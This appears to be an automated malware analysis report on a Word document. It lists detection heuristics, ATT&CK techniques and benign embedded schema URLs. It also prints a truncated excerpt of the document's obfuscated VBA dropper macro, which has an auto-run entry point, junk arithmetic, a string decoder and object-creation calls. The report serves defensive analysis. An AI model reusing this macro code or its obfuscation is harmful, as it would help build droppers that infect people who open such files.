MALICIOUS
Risk Score: 282
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Word document containing VBA macros. The 'AutOOpen' macro is designed to execute automatically upon opening. The document body explicitly prompts the user to 'Enable Editing' and 'Enable Content', a common lure for macro-based malware. The presence of 'CreateObject' and 'CallByName' calls within the VBA code suggests the macro is attempting to instantiate and interact with system objects, likely to download and execute a secondary payload.
Heuristics (9)
- ClamAV: Doc.Dropper.Agent-6544915-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6544915-0
- VBA macros detected [medium, 4 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- CreateObject call [high] OLE_VBA_CREATEOBJ: CreateObject call
- CallByName call [high] OLE_VBA_CALLBYNAME: CallByName call
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Macro/content-enable lure [medium] SE_ENABLE_LURE: Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - `http://schemas.microsof`: In document text (OLE body)
  - `http://ns.adobe.com/xap/1.0/`: In document text (OLE body)
  - `http://www.w3.org/1999/02/22-rdf-syntax-ns#`: In document text (OLE body)
  - `http://ns.adobe.com/xap/1.0/rights/`: In document text (OLE body)
  - `http://ns.adobe.com/xap/1.0/mm/`: In document text (OLE body)
  - `http://ns.adobe.com/xap/1.0/sType/ResourceRef#`: In document text (OLE body)
  - `http://schemas.openxmlformats.org/drawingml/2006/main`: In document text (OLE body)
  - `http://schemas.microsoft.com/office/2006/metadata/contentType`: In document text (OLE body)
  - `http://schemas.microsoft.com/office/2006/metadata/properties/metaAttributes`: In document text (OLE body)
  - `http://schemas.microsoft.com/office/2006/metadata/properties`: In document text (OLE body)
  - `http://www.w3.org/2001/XMLSchema`: In document text (OLE body)
  - `http://schemas.microsoft.com/sharepoint/v3`: In document text (OLE body)
  - `http://schemas.microsoft.com/sharepoint/v4`: In document text (OLE body)
  - `http://schemas.microsoft.com/office/2006/documentManagement/types`: In document text (OLE body)
  - `http://schemas.microsoft.com/office/infopath/2007/PartnerControls`: In document text (OLE body)
  - `http://schemas.microsoft.com/office/2006/docu`: In document text (OLE body)
  - `http://schemas.openxmlformats.org/package/2006/metadata/core-properties`: In document text (OLE body)
  - `http://www.w3.org/2001/XMLSchema-instance`: In document text (OLE body)
  - `http://purl.org/dc/elements/1.1/`: In document text (OLE body)
  - `http://purl.org/dc/terms/`: In document text (OLE body)
  - `http://schemas.microsoft.com/internal/obd`: In document text (OLE body)
  - `http://dublincore.org/schemas/xmls/qdc/2003/04/02/dc.xsd`: In document text (OLE body)
  - `http://dublincore.org/schemas/xmls/qdc/2003/04/02/dcterms.xsd`: In document text (OLE body)
  - `http://schemas.microsoft.com/office/2006/metadata/longProperties`: In document text (OLE body)
  - `http://schemas.openxmlformats.org/officeDocument/2006/customXml`: In document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8272 bytes | cb401f13e6806952737b5e7e38d6645c189d8982854c90b75e2d4cbb40aabb70 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutOOpen()
firephar
oknepriK = 9 - 57
oknepriK = oknepriK + 3 - oknepriK - oknepri
oknepriK = 1 + oknepriK + 3
oknepriK = 55 - 3
oknepriK = 11 * 15 - 19 * 25 * oknepri
End Sub
Attribute VB_Name = "adameaster"
Attribute VB_Base = "0{2C92BB5A-A8A1-407F-A8FE-2EE3E5303E04}{0316BAD8-4FE1-4CB8-99EB-C800EBE2699A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub kill_Diabl_Change()
amigamarc = xaochekbn(astigfeu)
splenski = xaochekbn(astigfeu)
dream301 = xaochekbn(andrewkids)
ffffffdisk = xaochekbn(andrewkids)
AYLEGEREZ = 37 * 42
AYLEGEREZ = 82 - 5
AYLEGEREZ = 91 - 10 + 7
AYLEGEREZ = 131 - 107 + 35 - AYLEGERE
AYLEGEREZ = 7 - 34 - 24 + 4
mykeybuzz amigamarc, splenski, dream301, ffffffdisk
End Sub
Attribute VB_Name = "allenflash"
Function deepdota()
deepdota = cogkulbr.haiteev5
End Function
Function gx999631(rose1288)
yrasrevda = ""
lawsellt = Len(rose1288)
oknepriK = 9 - 57
oknepriK = 1 + oknepriK + 3
oknepriK = 55 - 3
oknepriK = 11 * 15 - 11 * 25 * oknepri
For avalonmark = 1 To lawsellt
yrasrevda = yrasrevda + avokniriM(sherry192(rose1288, avalonmark), 4)
oknepriK = 9 - 57
oknepriK = oknepriK + 3 - oknepriK - oknepri
oknepriK = 55 - 3
oknepriK = 11 * 15 - 11 * 25 * oknepri
Next avalonmark
oknepriK = 9 - 57
oknepriK = oknepriK + 3 - oknepriK - oknepri
oknepriK = 1 + oknepriK + 3
oknepriK = 55 - 3
gx999631 = yrasrevda
End Function
Attribute VB_Name = "bagshect"
Function caslingi()
caslingi = adameaster.thrinbit
End Function
Function sherry192(salmon1959, oras1974)
sherry192 = Mid(salmon1959, oras1974, 1)
End Function
Function mykeybuzz(felixgizmo, sitesmile, tsiDsaZ3, aykobilovbuff)
oknepriK = 9 - 57
oknepriK = oknepriK + 3 - oknepriK - oknepri
oknepriK = 1 + oknepriK + 3
oknepriK = 55 - 3
oknepriK = 11 * 15 - 11 * 25 * oknepri
cogkulbr.jason163 = marcynkb(felixgizmo, sitesmile) + subflira(felixgizmo, tsiDsaZ3) + webwin98(aykobilovbuff)
End Function
Function IIKSVOPAHS()
IIKSVOPAHS = "Qmmgcc[Qygoui;ugo]/lEmaE[xR]QgluhR/uyE.]/"
End Function
Attribute VB_Name = "cogkulbr"
Attribute VB_Base = "0{5607C534-CEF6-4D6B-B00C-9DC182D16A60}{277B3D3D-63DF-4BD9-89C4-0F01CD92206C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CheckBox1_Click()
MsgBox "Ok"
End Sub
Private Sub CommandButton1_Click()
MsgBox "Ok"
End Sub
Private Sub jason163_Change()
Set thebidea = CreateObject(agrardri)
voluntarism = 53 * 91
voluntarism = voluntarism * 1 - 76 + 14 * 3
voluntarism = 12 + 1
voluntarism = voluntarism - 13 * 8 - voluntaris
gjlcdtxy thebidea
End Sub
Private Sub Label1_Click()
MsgBox "Ok"
End Sub
Private Sub ToggleButton1_Click()
MsgBox "Ok"
End Sub
Attribute VB_Name = "dreadnec"
Attribute VB_Base = "0{877B09D5-74BA-4EC0-846F-726AE1A9B3B2}{8994CB60-5E16-4EC6-80A6-42311E52B588}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Egjvbyfk"
Function webwin98(bellejosh)
oknepriK = 9 - 57
oknepriK = oknepriK + 3 - oknepriK - oknepri
oknepriK = 1 + oknepriK + 3
oknepriK = 55 - 3
oknepriK = 11 * 15 - 11 * 25 * oknepri
webwin98 = gx999631(IIKSVOPAHS + dreadnec.candydisk) + bellejosh + _
gx999631(dreadnec.rainbow008) + bellejosh + gx999631(adameaster.versropg)
End Function
Function astigfeu()
astigfeu = dreadnec.Bulle
```

... (truncated)